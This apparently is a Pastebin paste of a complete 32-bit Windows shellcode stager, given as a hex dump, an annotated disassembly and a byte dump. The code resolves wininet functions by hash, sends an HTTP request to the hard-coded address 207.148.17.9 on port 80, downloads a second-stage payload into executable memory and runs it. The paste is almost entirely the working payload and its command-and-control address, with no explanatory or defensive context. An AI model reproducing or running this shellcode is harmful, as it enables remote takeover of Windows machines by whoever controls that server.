Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 6a 50 e8 b0 00 00 00 2f 79 6d 42 4e 43 54 46 51 36 43 67 38 4c 54 30 73 5a 72 4c 66 4f 77 55 2d 6b 65 32 42 53 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 32 30 37 2e 31 34 38 2e 31 37 2e 39 00
- 0x00000000 fc cld
- 0x00000001 e882000000 call 0x00000088
- 0x00000006 60 pushad
- 0x00000007 89e5 mov ebp,esp
- 0x00000009 31c0 xor eax,eax
- 0x0000000b 648b5030 fs: mov edx,dword [eax + 48]
- 0x0000000f 8b520c mov edx,dword [edx + 12]
- 0x00000012 8b5214 mov edx,dword [edx + 20]
- 0x00000015 8b7228 mov esi,dword [edx + 40]
- 0x00000018 0fb74a26 movzx ecx,word [edx + 38]
- 0x0000001c 31ff xor edi,edi
- 0x0000001e ac lodsb
- 0x0000001f 3c61 cmp al,97
- 0x00000021 7c02 jl 0x00000025
- 0x00000023 2c20 sub al,32
- 0x00000025 c1cf0d ror edi,13
- 0x00000028 01c7 add edi,eax
- 0x0000002a e2f2 loop 0x0000001e
- 0x0000002c 52 push edx
- 0x0000002d 57 push edi
- 0x0000002e 8b5210 mov edx,dword [edx + 16]
- 0x00000031 8b4a3c mov ecx,dword [edx + 60]
- 0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120]
- 0x00000038 e348 jecxz 0x00000082
- 0x0000003a 01d1 add ecx,edx
- 0x0000003c 51 push ecx
- 0x0000003d 8b5920 mov ebx,dword [ecx + 32]
- 0x00000040 01d3 add ebx,edx
- 0x00000042 8b4918 mov ecx,dword [ecx + 24]
- 0x00000045 e33a jecxz 0x00000081
- 0x00000047 49 dec ecx
- 0x00000048 8b348b mov esi,dword [ebx + ecx * 4]
- 0x0000004b 01d6 add esi,edx
- 0x0000004d 31ff xor edi,edi
- 0x0000004f ac lodsb
- 0x00000050 c1cf0d ror edi,13
- 0x00000053 01c7 add edi,eax
- 0x00000055 38e0 cmp al,ah
- 0x00000057 75f6 jnz 0x0000004f
- 0x00000059 037df8 add edi,dword [ebp - 8]
- 0x0000005c 3b7d24 cmp edi,dword [ebp + 36]
- 0x0000005f 75e4 jnz 0x00000045
- 0x00000061 58 pop eax
- 0x00000062 8b5824 mov ebx,dword [eax + 36]
- 0x00000065 01d3 add ebx,edx
- 0x00000067 668b0c4b mov cx,word [ebx + ecx * 2]
- 0x0000006b 8b581c mov ebx,dword [eax + 28]
- 0x0000006e 01d3 add ebx,edx
- 0x00000070 8b048b mov eax,dword [ebx + ecx * 4]
- 0x00000073 01d0 add eax,edx
- 0x00000075 89442424 mov dword [esp + 36],eax
- 0x00000079 5b pop ebx
- 0x0000007a 5b pop ebx
- 0x0000007b 61 popad
- 0x0000007c 59 pop ecx
- 0x0000007d 5a pop edx
- 0x0000007e 51 push ecx
- 0x0000007f ffe0 jmp eax
- 0x00000081 5f pop edi
- 0x00000082 5f pop edi
- 0x00000083 5a pop edx
- 0x00000084 8b12 mov edx,dword [edx]
- 0x00000086 eb8d jmp 0x00000015
- 0x00000088 5d pop ebp
- 0x00000089 686e657400 push 0x0074656e--> 'ten'
- 0x0000008e 6877696e69 push 0x696e6977--> 'iniw'
- 0x00000093 54 push esp
- 0x00000094 684c772607 push 0x0726774c--> '&wL'
- 0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA
- 0x0000009b 31db xor ebx,ebx
- 0x0000009d 53 push ebx
- 0x0000009e 53 push ebx
- 0x0000009f 53 push ebx
- 0x000000a0 53 push ebx
- 0x000000a1 53 push ebx
- 0x000000a2 683a5679a7 push 0xa779563a--> 'yV:'
- 0x000000a7 ffd5 call ebp --> wininet.dll!InternetOpenA
- 0x000000a9 53 push ebx
- 0x000000aa 53 push ebx
- 0x000000ab 6a03 push 3
- 0x000000ad 53 push ebx
- 0x000000ae 53 push ebx
- 0x000000af 6a50 push 80
- 0x000000b1 e8b0000000 call 0x00000166
- 0x000000b6 2f das
- 0x000000b7 796d jns 0x00000126
- 0x000000b9 42 inc edx
- 0x000000ba 4e dec esi
- 0x000000bb 43 inc ebx
- 0x000000bc 54 push esp
- 0x000000bd 46 inc esi
- 0x000000be 51 push ecx
- 0x000000bf 3643 ss: inc ebx
- 0x000000c1 67384c5430 cmp byte [esp + edx * 2 + 48],cl
- 0x000000c6 735a jnc 0x00000122
- 0x000000c8 724c jc 0x00000116
- 0x000000ca 664f dec edi
- 0x000000cc 7755 ja 0x00000123
- 0x000000ce 2d6b653242 sub eax,0x4232656b
- 0x000000d3 53 push ebx
- 0x000000d4 005068 add byte [eax + 104],dl
- 0x000000d7 57 push edi
- 0x000000d8 899fc6ffd589 mov dword [edi - 1982464058],ebx
- 0x000000de c6536800 mov byte [ebx + 104],0
- 0x000000e2 32e0 xor ah,al
- 0x000000e4 845353 test byte [ebx + 83],dl
- 0x000000e7 53 push ebx
- 0x000000e8 57 push edi
- 0x000000e9 53 push ebx
- 0x000000ea 56 push esi
- 0x000000eb 68eb552e3b push 0x3b2e55eb--> ';.U'
- 0x000000f0 ffd5 call ebp --> wininet.dll!HttpOpenRequestA
- 0x000000f2 96 xchg eax,esi
- 0x000000f3 6a0a push 10
- 0x000000f5 5f pop edi
- 0x000000f6 6880330000 push 0x00003380
- 0x000000fb 89e0 mov eax,esp
- 0x000000fd 6a04 push 4
- 0x000000ff 50 push eax
- 0x00000100 6a1f push 31
- 0x00000102 56 push esi
- 0x00000103 6875469e86 push 0x869e4675--> 'Fu'
- 0x00000108 ffd5 call ebp --> wininet.dll!InternetSetOptionA
- 0x0000010a 53 push ebx
- 0x0000010b 53 push ebx
- 0x0000010c 53 push ebx
- 0x0000010d 53 push ebx
- 0x0000010e 56 push esi
- 0x0000010f 682d06187b push 0x7b18062d--> '{-'
- 0x00000114 ffd5 call ebp --> wininet.dll!HttpSendRequestA
- 0x00000116 85c0 test eax,eax
- 0x00000118 7516 jnz 0x00000130
- 0x0000011a 6888130000 push 0x00001388
- 0x0000011f 6844f035e0 push 0xe035f044--> '5D'
- 0x00000124 ffd5 call ebp --> kernel32.dll!Sleep
- 0x00000126 4f dec edi
- 0x00000127 75cd jnz 0x000000f6
- 0x00000129 68f0b5a256 push 0x56a2b5f0
- 0x0000012e ffd5 call ebp --> kernel32.dll!ExitProcess
- 0x00000130 6a40 push 64
- 0x00000132 6800100000 push 4096
- 0x00000137 6800004000 push 0x00400000
- 0x0000013c 53 push ebx
- 0x0000013d 6858a453e5 push 0xe553a458--> 'SX'
- 0x00000142 ffd5 call ebp --> kernel32.dll!VirtualAlloc
- 0x00000144 93 xchg eax,ebx
- 0x00000145 53 push ebx
- 0x00000146 53 push ebx
- 0x00000147 89e7 mov edi,esp
- 0x00000149 57 push edi
- 0x0000014a 6800200000 push 0x00002000
- 0x0000014f 53 push ebx
- 0x00000150 56 push esi
- 0x00000151 68129689e2 push 0xe2899612
- 0x00000156 ffd5 call ebp --> wininet.dll!InternetReadFile
- 0x00000158 85c0 test eax,eax
- 0x0000015a 74cd jz 0x00000129
- 0x0000015c 8b07 mov eax,dword [edi]
- 0x0000015e 01c3 add ebx,eax
- 0x00000160 85c0 test eax,eax
- 0x00000162 75e5 jnz 0x00000149
- 0x00000164 58 pop eax
- 0x00000165 c3 ret
- 0x00000166 5f pop edi
- 0x00000167 e869ffffff call 0x000000d5
- 0x0000016c 3230 xor dh,byte [eax]
- 0x0000016e 37 aaa
- 0x0000016f 2e313438 cs: xor dword [eax + edi],esi
- 0x00000173 2e3137 cs: xor dword [edi],esi
- 0x00000176 2e3900 cs: cmp dword [eax],eax
- Byte Dump:
- ......`..1.d.P0.R.R..r(..J&1..<a|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSjP...../ymBNCTFQ6Cg8LT0sZrLfOwU-ke2BS.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{....u.h....hD.5...Ou.h...V..j@h....h..@.ShX.S....SS..Wh...SVh........t.......u.X._.i...207.148.17.9.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement